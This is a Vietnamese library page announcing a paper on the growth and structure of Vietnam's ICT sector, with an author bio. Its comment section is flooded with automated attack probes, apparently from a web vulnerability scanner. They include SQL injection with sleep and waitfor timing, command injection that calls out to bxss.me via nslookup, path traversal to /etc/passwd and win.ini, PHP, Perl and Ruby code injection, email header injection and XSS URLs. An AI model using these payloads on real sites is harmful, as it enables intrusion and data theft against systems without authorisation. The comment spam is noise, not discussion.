Image

Tác giả

Đặng Thị Việt Đức

Năm xuất bản

01/10/2020

Chuyên mục

Tài liệu CNTT

Mô tả

Vietnam has early set the strategy to develop ICT as the enabler for social-economic development and the Vietnamese ICT sector has grown significantly over the past 20 years. This paper analyses the development of the ICT sector by examining the sources of output growth and the structural changes in two periods of 2007-2012 and 2012-2016. The decomposition results show that the growth of the ICT manufacturing sector is attributed to export in both periods. However, the ICT manufacturing export was mainly based on components import; the sector neither could make any technological progress nor could manufacture products for import substitution. The ICT media and content sector's growth was primarily due to technology advancement in 2007-2012 which led to the household demand-based development in the period 2012-2016. The ICT services sector shifted from primarily served government to household demand while technology was also significantly improved. The results of decomposition analysis are consistent with the macroeconomic situation as well as the ICT policies that the Vietnamese government has implemented over the past years. The paper points out the achievements and limitations in the ICT development policies and suggests directions for ICT policymakers in Vietnam in the coming period.

admin_img

Người đăng

Đặng Thị Việt Đức

Cô Đức giảng dạy các môn học liên quan tới tài chính như tài chính tiền tệ, quản trị tài chính, định giá doanh nghiệp, phân tích tài chính doanh nghiệp cho bậc đại học và cao học và quản trị tri thức cho bậc tiến sỹ. Ngoài giảng dạy tại Học viện Công nghệ Bưu chính Viễn thông, cô Đức cũng tham gia giảng dạy các chương trình liên kết bằng tiếng Anh tại các cơ sở đào tạo khác như Đại học Quốc gia Hà Nội, Viện Đại học Mở Hà Nội...

Bình luận

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:52 29/12/2022 - Reply

e

qeNtfPNC 10:52 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

response.write(9624160*9291972)

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC: %0abcc:074625.860-18363.860.22200.19355.2@bxss.me

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

'+response.write(9624160*9291972)+'

qeNtfPNC 10:54 29/12/2022 - Reply

to@example.com>%0d%0abcc:074625.860-18364.860.22200.19355.2@bxss.me

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

"+response.write(9624160*9291972)+"

qeNtfPNC%0abcc:074625.860-18365.860.22200.19355.2@bxss.me 10:54 29/12/2022 - Reply

@qeNtfPNC:

response.write(9317491*9390291) 10:54 29/12/2022 - Reply

@qeNtfPNC:

to@example.com>%0d%0abcc:074625.860-18366.860.22200.19355.2@bxss.me 10:54 29/12/2022 - Reply

@qeNtfPNC:

'+response.write(9317491*9390291)+' 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

"+response.write(9317491*9390291)+" 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

../../../../../../../../../../../../../../etc/passwd

10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

../../../../../../../../../../../../../../windows/win.ini

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

file:///etc/passwd

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC: <esi:include src="http://bxss.me/rpb.png"/>

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

../@qeNtfPNC:

qeNtfPNC<esi:include src="http://bxss.me/rpb.png"/> 10:54 29/12/2022 - Reply

@qeNtfPNC:

../../../../../../../../../../../../../../etc/passwd 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

../../../../../../../../../../../../../../windows/win.ini 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

echo nqomao$()\ gadgmy\nz^xyu||a #' &echo nqomao$()\ gadgmy\nz^xyu||a #|" &echo nqomao$()\ gadgmy\nz^xyu||a #

file:///etc/passwd 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

&echo cjaebh$()\ qpzmmk\nz^xyu||a #' &echo cjaebh$()\ qpzmmk\nz^xyu||a #|" &echo cjaebh$()\ qpzmmk\nz^xyu||a #

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

${10000227+10000367}

QTIySjB2SGM= 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

|echo eauyif$()\ zknlfy\nz^xyu||a #' |echo eauyif$()\ zknlfy\nz^xyu||a #|" |echo eauyif$()\ zknlfy\nz^xyu||a #

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

../qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

${9999725+10000303} 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

(nslookup hitdocfqbtelq0ec92.bxss.me||perl -e "gethostbyname('hitdocfqbtelq0ec92.bxss.me')")

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

$(nslookup hitwewofcgibrd51e2.bxss.me||perl -e "gethostbyname('hitwewofcgibrd51e2.bxss.me')")

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

&nslookup hiteqqswdxany88e5c.bxss.me&'\"`0&nslookup hiteqqswdxany88e5c.bxss.me&`'

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

&(nslookup hitmhzibnqdmmaca8f.bxss.me||perl -e "gethostbyname('hitmhzibnqdmmaca8f.bxss.me')")&'\"`0&(nslookup hitmhzibnqdmmaca8f.bxss.me||perl -e "gethostbyname('hitmhzibnqdmmaca8f.bxss.me')")&`'

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

|(nslookup hitqvegsuacdb59598.bxss.me||perl -e "gethostbyname('hitqvegsuacdb59598.bxss.me')")

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

'.gethostbyname(lc('hitty'.'dhohiaar83712.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(70).chr(104).chr(90).'

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

`(nslookup hitrfqrpbbvzg7d32f.bxss.me||perl -e "gethostbyname('hitrfqrpbbvzg7d32f.bxss.me')")`

qeNtfPNC 10:54 29/12/2022 - Reply

".gethostbyname(lc("hitxd"."vkpqbywfc84d5.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(75).chr(120).chr(77)."

qeNtfPNC 10:54 29/12/2022 - Reply

)

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

;(nslookup hitwmzevfrwno6f4df.bxss.me||perl -e "gethostbyname('hitwmzevfrwno6f4df.bxss.me')")|(nslookup hitwmzevfrwno6f4df.bxss.me||perl -e "gethostbyname('hitwmzevfrwno6f4df.bxss.me')")&(nslookup hitwmzevfrwno6f4df.bxss.me||perl -e "gethostbyname('hitwmzevfrwno6f4df.bxss.me')")

'.gethostbyname(lc('hitvg'.'ggayywvgbcd8e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(76).chr(103).chr(74).' 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

!(()&&!|*|*|

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

echo mlibot$()\ ynngez\nz^xyu||a #' &echo mlibot$()\ ynngez\nz^xyu||a #|" &echo mlibot$()\ ynngez\nz^xyu||a # 10:54 29/12/2022 - Reply

@qeNtfPNC:

".gethostbyname(lc("hitlq"."mvalrfpa8771a.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(70).chr(111).chr(66)." 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

^(#$!@#$)(()))******

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

&echo titaco$()\ kyajps\nz^xyu||a #' &echo titaco$()\ kyajps\nz^xyu||a #|" &echo titaco$()\ kyajps\nz^xyu||a # 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

) 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

|echo aobyoh$()\ orkthm\nz^xyu||a #' |echo aobyoh$()\ orkthm\nz^xyu||a #|" |echo aobyoh$()\ orkthm\nz^xyu||a # 10:54 29/12/2022 - Reply

@qeNtfPNC:

!(()&&!|*|*| 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

(nslookup hitlzfxqubplkc32bc.bxss.me||perl -e "gethostbyname('hitlzfxqubplkc32bc.bxss.me')") 10:54 29/12/2022 - Reply

@qeNtfPNC:

^(#$!@#$)(()))****** 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

HttP://bxss.me/t/xss.html?%00

$(nslookup hitziyhdpgsqx20be4.bxss.me||perl -e "gethostbyname('hitziyhdpgsqx20be4.bxss.me')") 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

bxss.me/t/xss.html?%00

&nslookup hitigsxaritnief52e.bxss.me&'\"`0&nslookup hitigsxaritnief52e.bxss.me&`' 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

HttP://bxss.me/t/xss.html?%00 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

|(nslookup hitnyttlayxqi549d2.bxss.me||perl -e "gethostbyname('hitnyttlayxqi549d2.bxss.me')") 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

xfs.bxss.me

bxss.me/t/xss.html?%00 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

"+"A".concat(70-3).concat(22*4).concat(98).concat(79).concat(99).concat(86)+(require"socket" Socket.gethostbyname("hitck"+"lzoemljgc6abd.bxss.me.")[3].to_s)+"

qeNtfPNC 10:54 29/12/2022 - Reply

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

qeNtfPNC 10:54 29/12/2022 - Reply

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

xfs.bxss.me 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

`(nslookup hitmzwomjszyb0e168.bxss.me||perl -e "gethostbyname('hitmzwomjszyb0e168.bxss.me')")` 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

';print(md5(31337));$a='

qeNtfPNC 10:54 29/12/2022 - Reply

'+'A'.concat(70-3).concat(22*4).concat(108).concat(86).concat(112).concat(79)+(require'socket' Socket.gethostbyname('hitqi'+'rolrcppqe3e6e.bxss.me.')[3].to_s)+'

qeNtfPNC 10:54 29/12/2022 - Reply

Http://bxss.me/t/fit.txt

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

"+"A".concat(70-3).concat(22*4).concat(104).concat(82).concat(101).concat(81)+(require"socket" Socket.gethostbyname("hitpr"+"xberzfmyb4fb7.bxss.me.")[3].to_s)+" 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

";print(md5(31337));$a="

qeNtfPNC 10:54 29/12/2022 - Reply

http://bxss.me/t/fit.txt%3F.jpg

'+'A'.concat(70-3).concat(22*4).concat(119).concat(81).concat(115).concat(88)+(require'socket' Socket.gethostbyname('hitux'+'nxyvuwwwf8668.bxss.me.')[3].to_s)+' 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

${@print(md5(31337))}

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

/etc/shells

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

${@print(md5(31337))}\

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

c:/windows/win.ini

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

'.print(md5(31337)).'

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

bxss.me

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

';print(md5(31337));$a=' 10:54 29/12/2022 - Reply

@qeNtfPNC:

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

'"

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg 10:54 29/12/2022 - Reply

@qeNtfPNC:

";print(md5(31337));$a=" 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

<!--

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

Http://bxss.me/t/fit.txt 10:54 29/12/2022 - Reply

@qeNtfPNC:

'" 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

${@print(md5(31337))} 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

<!-- 10:54 29/12/2022 - Reply

@qeNtfPNC:

${@print(md5(31337))}\ 10:54 29/12/2022 - Reply

@qeNtfPNC:

http://bxss.me/t/fit.txt%3F.jpg 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC: '"()&%<zzz><br />

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

/etc/shells 10:54 29/12/2022 - Reply

@qeNtfPNC:

'.print(md5(31337)).' 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

'"()&%<zzz><br />

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

c:/windows/win.ini 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC: 9120451

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC'"()&%<zzz><br /> 10:54 29/12/2022 - Reply

@qeNtfPNC:

bxss.me 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

'"()&%<zzz><br /> 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC9196592 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:54 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:55 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:55 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:55 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:55 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:55 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:56 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:56 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:56 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 10:56 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 11:00 29/12/2022 - Reply

VZnOfAaQ

qeNtfPNC 11:00 29/12/2022 - Reply

-1 OR 2+880-880-1=0+0+0+1 --

qeNtfPNC 11:00 29/12/2022 - Reply

-1 OR 2+731-731-1=0+0+0+1

qeNtfPNC 11:00 29/12/2022 - Reply

-1' OR 2+472-472-1=0+0+0+1 --

qeNtfPNC 11:00 29/12/2022 - Reply

-1' OR 2+636-636-1=0+0+0+1 or 'iWkEXBTs'='

qeNtfPNC 11:00 29/12/2022 - Reply

-1" OR 2+914-914-1=0+0+0+1 --

qeNtfPNC 11:00 29/12/2022 - Reply

if(now()=sysdate(),sleep(15),0)

qeNtfPNC 11:00 29/12/2022 - Reply

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

qeNtfPNC 11:00 29/12/2022 - Reply

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

qeNtfPNC 11:00 29/12/2022 - Reply

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

qeNtfPNC 11:01 29/12/2022 - Reply

1 waitfor delay '0:0:15' --

qeNtfPNC 11:01 29/12/2022 - Reply

ykHl2wfm'; waitfor delay '0:0:15' --

qeNtfPNC 11:01 29/12/2022 - Reply

Ee4id6zc' OR 582=(SELECT 582 FROM PG_SLEEP(15))--

qeNtfPNC 11:01 29/12/2022 - Reply

h6aBCe1L') OR 565=(SELECT 565 FROM PG_SLEEP(15))--

qeNtfPNC 11:01 29/12/2022 - Reply

Dj5gaK8a')) OR 967=(SELECT 967 FROM PG_SLEEP(15))--

qeNtfPNC 11:02 29/12/2022 - Reply

@qeNtfPNC: '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

qeNtfPNC 11:02 29/12/2022 - Reply

1'"

qeNtfPNC 11:02 29/12/2022 - Reply

@@4aw7f

FazYYAVV 11:02 29/12/2022 - Reply

@qeNtfPNC:

-1 OR 2+532-532-1=0+0+0+1 -- 11:02 29/12/2022 - Reply

@qeNtfPNC:

-1 OR 2+902-902-1=0+0+0+1 11:02 29/12/2022 - Reply

@qeNtfPNC:

-1' OR 2+893-893-1=0+0+0+1 -- 11:02 29/12/2022 - Reply

@qeNtfPNC:

-1' OR 2+279-279-1=0+0+0+1 or '2OOYHbhP'=' 11:02 29/12/2022 - Reply

@qeNtfPNC:

-1" OR 2+93-93-1=0+0+0+1 -- 11:02 29/12/2022 - Reply

@qeNtfPNC:

if(now()=sysdate(),sleep(15),0) 11:02 29/12/2022 - Reply

@qeNtfPNC:

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z 11:02 29/12/2022 - Reply

@qeNtfPNC:

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z 11:03 29/12/2022 - Reply

@qeNtfPNC:

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ 11:03 29/12/2022 - Reply

@qeNtfPNC:

1 waitfor delay '0:0:15' -- 11:03 29/12/2022 - Reply

@qeNtfPNC:

Mks3lvAB'; waitfor delay '0:0:15' -- 11:03 29/12/2022 - Reply

@qeNtfPNC:

YUEiVOiD' OR 21=(SELECT 21 FROM PG_SLEEP(15))-- 11:03 29/12/2022 - Reply

@qeNtfPNC:

sJBVk0Df') OR 430=(SELECT 430 FROM PG_SLEEP(15))-- 11:03 29/12/2022 - Reply

@qeNtfPNC:

QMKOZemT')) OR 582=(SELECT 582 FROM PG_SLEEP(15))-- 11:03 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' 11:04 29/12/2022 - Reply

@qeNtfPNC:

1'" 11:04 29/12/2022 - Reply

@qeNtfPNC:

@@j6GsH 11:04 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 11:04 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 11:04 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 11:04 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 11:04 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 11:04 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 11:04 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 11:04 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 11:04 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 11:04 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 11:04 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 11:04 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 11:05 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 11:05 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 11:05 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 11:05 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 11:05 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 11:05 29/12/2022 - Reply

@qeNtfPNC:

qeNtfPNC 11:05 29/12/2022 - Reply

@qeNtfPNC:

Để lại bình luận

img

Đăng ký nhận bản tin